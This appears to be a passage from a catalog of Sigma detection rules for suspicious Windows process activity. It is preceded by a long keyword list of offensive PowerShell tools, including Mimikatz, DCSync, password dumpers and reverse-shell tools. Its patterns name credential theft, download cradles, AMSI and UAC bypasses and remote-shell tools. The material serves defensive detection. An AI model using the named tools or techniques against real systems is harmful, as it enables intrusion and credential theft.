- Export-ADRXML
- Find-Fruit
- Find-GPOLocation
- Find-TrustedDocuments
- Get-ADIDNS
- Get-ApplicationHost
- Get-ChromeDump
- Get-ClipboardContents
- Get-FoxDump
- Get-GPPPassword
- Get-IndexedItem
- Get-KerberosAESKey
- Get-Keystrokes
- Get-LSASecret
- Get-MachineAccountAttribute
- Get-MachineAccountCreator
- Get-PassHashes
- Get-RegAlwaysInstallElevated
- Get-RegAutoLogon
- Get-RemoteBootKey
- Get-RemoteCachedCredential
- Get-RemoteLocalAccountHash
- Get-RemoteLSAKey
- Get-RemoteMachineAccountHash
- Get-RemoteNLKMKey
- Get-RickAstley
- Get-Screenshot
- Get-SecurityPackages
- Get-ServiceFilePermission
- Get-ServicePermission
- Get-ServiceUnquoted
- Get-SiteListPassword
- Get-System
- Get-TimedScreenshot
- Get-UnattendedInstallFile
- Get-Unconstrained
- Get-USBKeystrokes
- Get-VaultCredential
- Get-VulnAutoRun
- Get-VulnSchTask
- Grant-ADIDNSPermission
- Gupt-Backdoor
- HTTP-Login
- Install-ServiceBinary
- Install-SSP
- Invoke-ACLScanner
- Invoke-ADRecon
- Invoke-ADSBackdoor
- Invoke-AgentSmith
- Invoke-AllChecks
- Invoke-ARPScan
- Invoke-AzureHound
- Invoke-BackdoorLNK
- Invoke-BadPotato
- Invoke-BetterSafetyKatz
- Invoke-BypassUAC
- Invoke-Carbuncle
- Invoke-Certify
- Invoke-ConPtyShell
- Invoke-CredentialInjection
- Invoke-DAFT
- Invoke-DCSync
- Invoke-DinvokeKatz
- Invoke-DllInjection
- Invoke-DNSUpdate
- Invoke-DomainPasswordSpray
- Invoke-DowngradeAccount
- Invoke-EgressCheck
- Invoke-Eyewitness
- Invoke-FakeLogonScreen
- Invoke-Farmer
- Invoke-Get-RBCD-Threaded
- Invoke-Gopher
- Invoke-Grouper
- Invoke-HandleKatz
- Invoke-ImpersonatedProcess
- Invoke-ImpersonateSystem
- Invoke-InteractiveSystemPowerShell
- Invoke-Internalmonologue
- Invoke-Inveigh
- Invoke-InveighRelay
- Invoke-KrbRelay
- Invoke-LdapSignCheck
- Invoke-Lockless
- Invoke-MalSCCM
- Invoke-Mimikatz
- Invoke-Mimikittenz
- Invoke-MITM6
- Invoke-NanoDump
- Invoke-NetRipper
- Invoke-Nightmare
- Invoke-NinjaCopy
- Invoke-OfficeScrape
- Invoke-OxidResolver
- Invoke-P0wnedshell
- Invoke-Paranoia
- Invoke-PortScan
- Invoke-PoshRatHttp
- Invoke-PostExfil
- Invoke-PowerDump
- Invoke-PowerShellTCP
- Invoke-PowerShellWMI
- Invoke-PPLDump
- Invoke-PsExec
- Invoke-PSInject
- Invoke-PsUaCme
- Invoke-ReflectivePEInjection
- Invoke-ReverseDNSLookup
- Invoke-Rubeus
- Invoke-RunAs
- Invoke-SafetyKatz
- Invoke-SauronEye
- Invoke-SCShell
- Invoke-Seatbelt
- Invoke-ServiceAbuse
- Invoke-ShadowSpray
- Invoke-Sharp
- Invoke-Shellcode
- Invoke-SMBScanner
- Invoke-Snaffler
- Invoke-Spoolsample
- Invoke-SpraySinglePassword
- Invoke-SSHCommand
- Invoke-StandIn
- Invoke-StickyNotesExtract
- Invoke-SystemCommand
- Invoke-Tasksbackdoor
- Invoke-Tater
- Invoke-Thunderfox
- Invoke-ThunderStruck
- Invoke-TokenManipulation
- Invoke-Tokenvator
- Invoke-TotalExec
- Invoke-UrbanBishop
- Invoke-UserHunter
- Invoke-VoiceTroll
- Invoke-Whisker
- Invoke-WinEnum
- Invoke-winPEAS
- Invoke-WireTap
- Invoke-WmiCommand
- Invoke-WMIExec
- Invoke-WScriptBypassUAC
- Invoke-Zerologon
- MailRaider
- New-ADIDNSNode
- New-DNSRecordArray
- New-HoneyHash
- New-InMemoryModule
- New-MachineAccount
- New-SOASerialNumberArray
- Out-Minidump
- Port-Scan
- PowerBreach
- 'powercat '
- PowerUp
- PowerView
- Remove-ADIDNSNode
- Remove-MachineAccount
- Remove-Update
- Rename-ADIDNSNode
- Revoke-ADIDNSPermission
- Set-ADIDNSNode
- Set-MacAttribute
- Set-MachineAccountAttribute
- Set-Wallpaper
- Show-TargetScreen
- Start-CaptureServer
- Start-Dnscat2
- Start-WebcamRecorder
- VolumeShadowCopyTools
Arbitrary File Download Via GfxDownloadWrapper.EXE
- source: sigma
- technicques:
- t1105
Description
Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_known_urls:
CommandLine|contains: https://gameplayapi.intel.com/
selection:
CommandLine|contains:
- http://
- https://
Image|endswith: \GfxDownloadWrapper.exe
Suspicious Curl.EXE Download
- source: sigma
- technicques:
- t1105
Description
Detects a suspicious curl process start on Windows and outputs the requested document to a local file
Detection logic
condition: selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*
filter_optional_git_windows:
CommandLine|contains|all:
- '--silent --show-error --output '
- gfw-httpget-
- AppData
Image: C:\Program Files\Git\mingw64\bin\curl.exe
ParentImage: C:\Program Files\Git\usr\bin\sh.exe
selection_curl:
- Image|endswith: \curl.exe
- Product: The curl executable
selection_susp_extensions:
CommandLine|endswith:
- .dll
- .gif
- .jpeg
- .jpg
- .png
- .temp
- .tmp
- .txt
- .vbe
- .vbs
selection_susp_locations:
CommandLine|contains:
- '%AppData%'
- '%Public%'
- '%Temp%'
- '%tmp%'
- \AppData\
- \Desktop\
- \Temp\
- \Users\Public\
- C:\PerfLogs\
- C:\ProgramData\
- C:\Windows\Temp\
Suspicious Download Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with certain flags that allow the utility to download files.
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains:
- 'urlcache '
- 'verifyctl '
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Proxy Execution Via Wuauclt.EXE
- source: sigma
- technicques:
- t1218
Description
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_generic:
CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '
filter_main_uus:
CommandLine|contains:
- :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId
- :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId
filter_main_winsxs:
CommandLine|contains|all:
- :\Windows\WinSxS\
- '\UpdateDeploy.dll /ClassId '
filter_main_wuaueng:
CommandLine|contains: ' wuaueng.dll '
selection_cli:
CommandLine|contains|all:
- UpdateDeploymentProvider
- RunHandlerComServer
selection_img:
- Image|endswith: \wuauclt.exe
- OriginalFileName: wuauclt.exe
WhoAmI as Parameter
- source: sigma
- technicques:
- t1033
Description
Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
Detection logic
condition: selection
selection:
CommandLine|contains: .exe whoami
Use of VSIISExeLauncher.exe
- source: sigma
- technicques:
- t1127
Description
The “VSIISExeLauncher.exe” binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
Detection logic
condition: all of selection*
selection_cli:
CommandLine|contains:
- ' -p '
- ' -a '
selection_img:
- Image|endswith: \VSIISExeLauncher.exe
- OriginalFileName: VSIISExeLauncher.exe
Windows Internet Hosted WebDav Share Mount Via Net.EXE
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Detects when an internet hosted webdav share is mounted using the “net.exe” utility
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- ' use '
- ' http'
selection_img:
- Image|endswith:
- \net.exe
- \net1.exe
- OriginalFileName:
- net.exe
- net1.exe
Harvesting Of Wifi Credentials Via Netsh.EXE
- source: sigma
- technicques:
- t1040
Description
Detect the harvesting of wifi credentials using netsh.exe
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- wlan
- ' s'
- ' p'
- ' k'
- =clear
selection_img:
- Image|endswith: \netsh.exe
- OriginalFileName: netsh.exe
HTML Help HH.EXE Suspicious Child Process
- source: sigma
- technicques:
- t1047
- t1059
- t1059.001
- t1059.003
- t1059.005
- t1059.007
- t1218
- t1218.001
- t1218.010
- t1218.011
- t1566
- t1566.001
Description
Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
Detection logic
condition: selection
selection:
Image|endswith:
- \CertReq.exe
- \CertUtil.exe
- \cmd.exe
- \cscript.exe
- \installutil.exe
- \MSbuild.exe
- \MSHTA.EXE
- \msiexec.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \schtasks.exe
- \wmic.exe
- \wscript.exe
ParentImage|endswith: \hh.exe
Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
- source: sigma
- technicques:
- t1218
- t1218.009
Description
Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
Detection logic
condition: all of selection_*
selection_dir:
CommandLine|contains:
- \AppData\Local\Temp\
- \Microsoft\Windows\Start Menu\Programs\Startup\
- \PerfLogs\
- \Users\Public\
- \Windows\Temp\
selection_img:
- Image|endswith:
- \Regsvcs.exe
- \Regasm.exe
- OriginalFileName:
- RegSvcs.exe
- RegAsm.exe
Outlook EnableUnsafeClientMailRules Setting Enabled
- source: sigma
- technicques:
- t1059
- t1202
Description
Detects an attacker trying to enable the outlook security setting “EnableUnsafeClientMailRules” which allows outlook to run applications or execute macros
Detection logic
condition: selection
selection:
CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules
HackTool - SharpMove Tool Execution
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Detects the execution of SharpMove, a .NET utility performing multiple tasks such as “Task Creation”, “SCM” query, VBScript execution using WMI via its PE metadata and command line options.
Detection logic
condition: selection_img or all of selection_cli_*
selection_cli_actions:
CommandLine|contains:
- action=create
- action=dcom
- action=executevbs
- action=hijackdcom
- action=modschtask
- action=modsvc
- action=query
- action=scm
- action=startservice
- action=taskscheduler
selection_cli_computer:
CommandLine|contains: computername=
selection_img:
- Image|endswith: \SharpMove.exe
- OriginalFileName: SharpMove.exe
File Download From IP URL Via Curl.EXE
- source: sigma
- technicques:
Description
Detects file downloads directly from IP address URL using curl.exe
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_ext:
CommandLine|endswith:
- .bat
- .bat"
- .dat
- .dat"
- .dll
- .dll"
- .exe
- .exe"
- .gif
- .gif"
- .hta
- .hta"
- .jpeg
- .jpeg"
- .log
- .log"
- .msi
- .msi"
- .png
- .png"
- .ps1
- .ps1"
- .psm1
- .psm1"
- .vbe
- .vbe"
- .vbs
- .vbs"
- .bat'
- .dat'
- .dll'
- .exe'
- .gif'
- .hta'
- .jpeg'
- .log'
- .msi'
- .png'
- .ps1'
- .psm1'
- .vbe'
- .vbs'
selection_flag:
CommandLine|contains:
- ' -O'
- --remote-name
- --output
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
selection_ip:
CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
Suspicious Provlaunch.EXE Child Process
- source: sigma
- technicques:
- t1218
Description
Detects suspicious child processes of “provlaunch.exe” which might indicate potential abuse to proxy execution.
Detection logic
condition: all of selection_*
selection_child:
- Image|endswith:
- \calc.exe
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \notepad.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
- Image|contains:
- :\PerfLogs\
- :\Temp\
- :\Users\Public\
- \AppData\Temp\
- \Windows\System32\Tasks\
- \Windows\Tasks\
- \Windows\Temp\
selection_parent:
ParentImage|endswith: \provlaunch.exe
Suspicious AddinUtil.EXE CommandLine Execution
- source: sigma
- technicques:
- t1218
Description
Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
Detection logic
condition: selection_img and (all of selection_susp_1_* or selection_susp_2)
selection_img:
- Image|endswith: \addinutil.exe
- OriginalFileName: AddInUtil.exe
selection_susp_1_flags:
CommandLine|contains:
- '-AddInRoot:'
- '-PipelineRoot:'
selection_susp_1_paths:
CommandLine|contains:
- \AppData\Local\Temp\
- \Desktop\
- \Downloads\
- \Users\Public\
- \Windows\Temp\
selection_susp_2:
CommandLine|contains:
- -AddInRoot:.
- -AddInRoot:"."
- -PipelineRoot:.
- -PipelineRoot:"."
CurrentDirectory|contains:
- \AppData\Local\Temp\
- \Desktop\
- \Downloads\
- \Users\Public\
- \Windows\Temp\
Renamed Plink Execution
- source: sigma
- technicques:
- t1036
Description
Detects the execution of a renamed version of the Plink binary
Detection logic
condition: selection and not filter
filter:
Image|endswith: \plink.exe
selection:
- OriginalFileName: Plink
- CommandLine|contains|all:
- ' -l forward'
- ' -P '
- ' -R '
Sideloading Link.EXE
- source: sigma
- technicques:
- t1218
Description
Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary “link.exe”. They can be abused to sideload any binary with the same name
Detection logic
condition: selection and not 1 of filter_*
filter_visual_studio:
ParentImage|contains: \VC\Tools\MSVC\
ParentImage|startswith:
- C:\Program Files\Microsoft Visual Studio\
- C:\Program Files (x86)\Microsoft Visual Studio\
selection:
CommandLine|contains: LINK /
Image|endswith: \link.exe
Abused Debug Privilege by Arbitrary Parent Processes
- source: sigma
- technicques:
- t1548
Description
Detection of unusual child processes by different system processes
Detection logic
condition: all of selection_* and not filter
filter:
CommandLine|contains|all:
- ' route '
- ' ADD '
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- \cmd.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Cmd.Exe
selection_parent:
ParentImage|endswith:
- \winlogon.exe
- \services.exe
- \lsass.exe
- \csrss.exe
- \smss.exe
- \wininit.exe
- \spoolsv.exe
- \searchindexer.exe
User|contains:
- AUTHORI
- AUTORI
Suspicious Download From Direct IP Via Bitsadmin
- source: sigma
- technicques:
- t1036
- t1036.003
- t1197
Description
Detects usage of bitsadmin downloading a file using an URL that contains an IP
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_seven_zip:
CommandLine|contains: ://7-
selection_extension:
CommandLine|contains:
- ://1
- ://2
- ://3
- ://4
- ://5
- ://6
- ://7
- ://8
- ://9
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_img:
- Image|endswith: \bitsadmin.exe
- OriginalFileName: bitsadmin.exe
Potential PowerShell Execution Policy Tampering - ProcCreation
- source: sigma
- technicques:
Description
Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine
Detection logic
condition: all of selection_*
selection_path:
CommandLine|contains:
- \ShellIds\Microsoft.PowerShell\ExecutionPolicy
- \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy
selection_values:
CommandLine|contains:
- Bypass
- RemoteSigned
- Unrestricted
Renamed BrowserCore.EXE Execution
- source: sigma
- technicques:
- t1036
- t1036.003
- t1528
Description
Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
Detection logic
condition: selection and not 1 of filter_*
filter_realbrowsercore:
Image|endswith: \BrowserCore.exe
selection:
OriginalFileName: BrowserCore.exe
Suspicious UltraVNC Execution
- source: sigma
- technicques:
- t1021
- t1021.005
Description
Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- '-autoreconnect '
- '-connect '
- '-id:'
Java Running with Remote Debugging
- source: sigma
- technicques:
- t1203
Description
Detects a JAVA process running with remote debugging allowing more than just localhost to connect
Detection logic
condition: all of selection_* and not exclusion
exclusion:
CommandLine|contains:
- address=127.0.0.1
- address=localhost
selection_jdwp_transport:
CommandLine|contains: transport=dt_socket,address=
selection_old_jvm_version:
CommandLine|contains:
- jre1.
- jdk1.
PowerShell Base64 Encoded WMI Classes
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects calls to base64 encoded WMI class such as “Win32_Shadowcopy”, “Win32_ScheduledJob”, etc.
Detection logic
condition: selection_img and 1 of selection_cli_*
selection_cli_loggedonuser:
CommandLine|contains:
- VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA
- cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA
- XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg
- V2luMzJfTG9nZ2VkT25Vc2Vy
- dpbjMyX0xvZ2dlZE9uVXNlc
- XaW4zMl9Mb2dnZWRPblVzZX
selection_cli_process:
CommandLine|contains:
- VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw
- cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA
- XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA
- V2luMzJfUHJvY2Vzc
- dpbjMyX1Byb2Nlc3
- XaW4zMl9Qcm9jZXNz
selection_cli_scheduledJob:
CommandLine|contains:
- VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA
- cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA
- XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg
- V2luMzJfU2NoZWR1bGVkSm9i
- dpbjMyX1NjaGVkdWxlZEpvY
- XaW4zMl9TY2hlZHVsZWRKb2
selection_cli_shadowcopy:
CommandLine|contains:
- VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ
- cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA
- XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A
- V2luMzJfU2hhZG93Y29we
- dpbjMyX1NoYWRvd2NvcH
- XaW4zMl9TaGFkb3djb3B5
selection_cli_useraccount:
CommandLine|contains:
- VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A
- cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA
- XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA
- V2luMzJfVXNlckFjY291bn
- dpbjMyX1VzZXJBY2NvdW50
- XaW4zMl9Vc2VyQWNjb3Vud
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
PUA - Adidnsdump Execution
- source: sigma
- technicques:
- t1018
Description
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
Detection logic
condition: selection
selection:
CommandLine|contains: adidnsdump
Image|endswith: \python.exe
Rundll32 Spawned Via Explorer.EXE
- source: sigma
- technicques:
Description
Detects execution of “rundll32.exe” with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
Detection logic
condition: all of selection_* and not 1 of filter_main_*
filter_main_generic:
- CommandLine|contains: ' C:\Windows\System32\'
- CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617'
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
selection_parent:
ParentImage|endswith: \explorer.exe
Suspicious File Encoded To Base64 Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with the “encode” flag to encode a file to base64 where the extensions of the file is suspicious
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash: -encode
selection_extension:
CommandLine|contains:
- .acl
- .bat
- .doc
- .gif
- .jpeg
- .jpg
- .mp3
- .pdf
- .png
- .ppt
- .tmp
- .xls
- .xml
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Query Usage To Exfil Data
- source: sigma
- technicques:
Description
Detects usage of “query.exe” a system binary to exfil information such as “sessions” and “processes” for later use
Detection logic
condition: selection
selection:
CommandLine|contains:
- session >
- process >
Image|endswith: :\Windows\System32\query.exe
RestrictedAdminMode Registry Value Tampering - ProcCreation
- source: sigma
- technicques:
- t1112
Description
Detects changes to the “DisableRestrictedAdmin” registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- \System\CurrentControlSet\Control\Lsa\
- DisableRestrictedAdmin
Changing Existing Service ImagePath Value Via Reg.EXE
- source: sigma
- technicques:
- t1574
- t1574.011
Description
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
Detection logic
condition: all of selection*
selection:
CommandLine|contains|all:
- 'add '
- SYSTEM\CurrentControlSet\Services\
- ' ImagePath '
Image|endswith: \reg.exe
selection_value:
CommandLine|contains|windash: ' -d '
Application Removed Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Uninstall an application with wmic
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- call
- uninstall
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
Node Process Executions
- source: sigma
- technicques:
- t1059
- t1059.007
- t1127
Description
Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
Detection logic
condition: selection and not filter
filter:
CommandLine|contains: Adobe Creative Cloud Experience\js
selection:
Image|endswith: \Adobe Creative Cloud Experience\libs\node.exe
Potential AMSI Bypass Using NULL Bits
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Detection logic
condition: selection
selection:
CommandLine|contains:
- if(0){{{0}}}' -f $(0 -as [char]) +
- '#<NULL>'
Potential UAC Bypass Via Sdclt.EXE
- source: sigma
- technicques:
- t1548
- t1548.002
Description
A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
Detection logic
condition: selection
selection:
Image|endswith: sdclt.exe
IntegrityLevel: High
Invoke-Obfuscation STDIN+ Launcher
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of stdin to execute PowerShell
Detection logic
condition: selection
selection:
CommandLine|re: cmd.{0,5}(?:/c|/r).+powershell.+(?:\$\{?input\}?|noexit).+\"
Arbitrary File Download Via MSOHTMED.EXE
- source: sigma
- technicques:
- t1218
Description
Detects usage of “MSOHTMED” to download arbitrary files
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ftp://
- http://
- https://
selection_img:
- Image|endswith: \MSOHTMED.exe
- OriginalFileName: MsoHtmEd.exe
Suspicious GrpConv Execution
- source: sigma
- technicques:
- t1547
Description
Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
Detection logic
condition: selection
selection:
CommandLine|contains:
- grpconv.exe -o
- grpconv -o
Suspicious Shells Spawn by Java Utility Keytool
- source: sigma
- technicques:
Description
Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Detection logic
condition: selection
selection:
Image|endswith:
- \cmd.exe
- \sh.exe
- \bash.exe
- \powershell.exe
- \pwsh.exe
- \schtasks.exe
- \certutil.exe
- \whoami.exe
- \bitsadmin.exe
- \wscript.exe
- \cscript.exe
- \scrcons.exe
- \regsvr32.exe
- \hh.exe
- \wmic.exe
- \mshta.exe
- \rundll32.exe
- \forfiles.exe
- \scriptrunner.exe
- \mftrace.exe
- \AppVLP.exe
- \systeminfo.exe
- \reg.exe
- \query.exe
ParentImage|endswith: \keytool.exe
Suspicious PowerShell Mailbox Export to Share
- source: sigma
- technicques:
Description
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- New-MailboxExportRequest
- ' -Mailbox '
- ' -FilePath \\\\'
Suspicious Control Panel DLL Load
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
Detection logic
condition: all of selection_* and not filter
filter:
CommandLine|contains: Shell32.dll
selection_img:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
selection_parent:
ParentImage|endswith: \System32\control.exe
Microsoft IIS Connection Strings Decryption
- source: sigma
- technicques:
- t1003
Description
Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
Detection logic
condition: all of selection*
selection_args:
CommandLine|contains|all:
- connectionStrings
- ' -pdf'
selection_name:
- Image|endswith: \aspnet_regiis.exe
- OriginalFileName: aspnet_regiis.exe
Conhost Spawned By Uncommon Parent Process
- source: sigma
- technicques:
- t1059
Description
Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_svchost:
ParentCommandLine|contains:
- -k apphost -s AppHostSvc
- -k imgsvc
- -k localService -p -s RemoteRegistry
- -k LocalSystemNetworkRestricted -p -s NgcSvc
- -k NetSvcs -p -s NcaSvc
- -k netsvcs -p -s NetSetupSvc
- -k netsvcs -p -s wlidsvc
- -k NetworkService -p -s DoSvc
- -k wsappx -p -s AppXSvc
- -k wsappx -p -s ClipSVC
filter_optional_dropbox:
ParentCommandLine|contains:
- C:\Program Files (x86)\Dropbox\Client\
- C:\Program Files\Dropbox\Client\
selection:
Image|endswith: \conhost.exe
ParentImage|endswith:
- \explorer.exe
- \lsass.exe
- \regsvr32.exe
- \rundll32.exe
- \services.exe
- \smss.exe
- \spoolsv.exe
- \svchost.exe
- \userinit.exe
- \wininit.exe
- \winlogon.exe
Terminal Service Process Spawn
- source: sigma
- technicques:
- t1190
- t1210
Description
Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
Detection logic
condition: selection and not 1 of filter_*
filter_img:
Image|endswith:
- \rdpclip.exe
- :\Windows\System32\csrss.exe
- :\Windows\System32\wininit.exe
- :\Windows\System32\winlogon.exe
filter_null:
Image: null
selection:
ParentCommandLine|contains|all:
- \svchost.exe
- termsvcs
Suspicious Greedy Compression Using Rar.EXE
- source: sigma
- technicques:
- t1059
Description
Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
Detection logic
condition: 1 of selection_opt_* and all of selection_cli_*
selection_cli_flags:
CommandLine|contains|all:
- ' -hp'
- ' -r '
selection_cli_folders:
CommandLine|contains:
- ' ?:\\\*.'
- ' ?:\\\\\*.'
- ' ?:\$Recycle.bin\'
- ' ?:\PerfLogs\'
- ' ?:\Temp'
- ' ?:\Users\Public\'
- ' ?:\Windows\'
- ' %public%'
selection_opt_1:
- Image|endswith: \rar.exe
- Description: Command line RAR
selection_opt_2:
CommandLine|contains:
- '.exe a '
- ' a -m'
Lolbin Runexehelper Use As Proxy
- source: sigma
- technicques:
- t1218
Description
Detect usage of the “runexehelper.exe” binary as a proxy to launch other programs
Detection logic
condition: selection
selection:
ParentImage|endswith: \runexehelper.exe
Process Creation Using Sysnative Folder
- source: sigma
- technicques:
- t1055
Description
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Detection logic
condition: sysnative
sysnative:
- CommandLine|contains: :\Windows\Sysnative\
- Image|contains: :\Windows\Sysnative\
Suspicious Execution of Powershell with Base64
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Commandline to launch powershell with a base64 payload
Detection logic
condition: selection and not 1 of filter_*
filter_azure:
ParentImage|contains:
- C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\
- \gc_worker.exe
filter_encoding:
CommandLine|contains: ' -Encoding '
selection:
CommandLine|contains:
- ' -e '
- ' -en '
- ' -enc '
- ' -enco'
- ' -ec '
Image|endswith:
- \powershell.exe
- \pwsh.exe
Potentially Suspicious Ping/Copy Command Combination
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects uncommon and potentially suspicious one-liner command containing both “ping” and “copy” at the same time, which is usually used by malware.
Detection logic
condition: all of selection_*
selection_action:
CommandLine|contains|all:
- ping
- 'copy '
selection_cli_1:
CommandLine|contains|windash: ' -n '
selection_cli_2:
CommandLine|contains|windash: ' -y '
selection_cmd:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
Imports Registry Key From an ADS
- source: sigma
- technicques:
- t1112
Description
Detects the import of a alternate datastream to the registry with regedit.exe.
Detection logic
condition: all of selection_* and not filter
filter:
CommandLine|contains|windash:
- ' -e '
- ' -a '
- ' -c '
selection_cli:
CommandLine|contains:
- ' /i '
- .reg
CommandLine|re: :[^ \\]
selection_img:
- Image|endswith: \regedit.exe
- OriginalFileName: REGEDIT.EXE
Potential Data Stealing Via Chromium Headless Debugging
- source: sigma
- technicques:
- t1185
Description
Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- --remote-debugging-
- --user-data-dir
- --headless
Uncommon Child Process Of AddinUtil.EXE
- source: sigma
- technicques:
- t1218
Description
Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_werfault:
Image|endswith:
- :\Windows\System32\conhost.exe
